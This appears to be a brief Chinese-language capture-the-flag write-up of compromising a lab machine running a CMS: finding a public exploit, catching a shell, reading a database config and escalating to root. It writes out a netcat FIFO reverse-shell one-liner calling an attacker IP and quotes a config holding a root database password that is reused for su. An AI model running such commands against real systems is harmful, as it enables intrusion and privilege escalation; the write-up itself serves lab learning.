信息搜集
只开了80
爆破一下
额,不用爆破
一进去就是http://10.10.14.74/一个cms

可以直接search
Pasted%20image%2020240128232104
拉下来后直接getshell

用这个奇怪的反弹shell
Pasted%20image%2020240128232212
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.14.69.58 9999 >/tmp/f

弹过去了后信息搜集

其实直接用那个poc也能搜集到


$db['default'] = array(
'dsn' => '',
'hostname' => 'localhost',
'username' => 'root',
'password' => 'mememe',
'database' => 'fuel_schema',
'dbdriver' => 'mysqli',
'dbprefix' => '',
'pconnect' => FALSE,
'db_debug' => (ENVIRONMENT !== 'production'),
'cache_on' => FALSE,
'cachedir' => '',
'char_set' => 'utf8',
'dbcollat' => 'utf8_general_ci',
'swap_pre' => '',
'encrypt' => FALSE,
'compress' => FALSE,
'stricton' => FALSE,
'failover' => array(),
'save_queries' => TRUE
);

// used for testing purposes
if (defined('TESTING'))
{
@include(TESTER_PATH.'config/tester_database'.EXT);
}

Pasted%20image%2020240128232420
而这里的pd,其实就是他的密码,直接su root就行了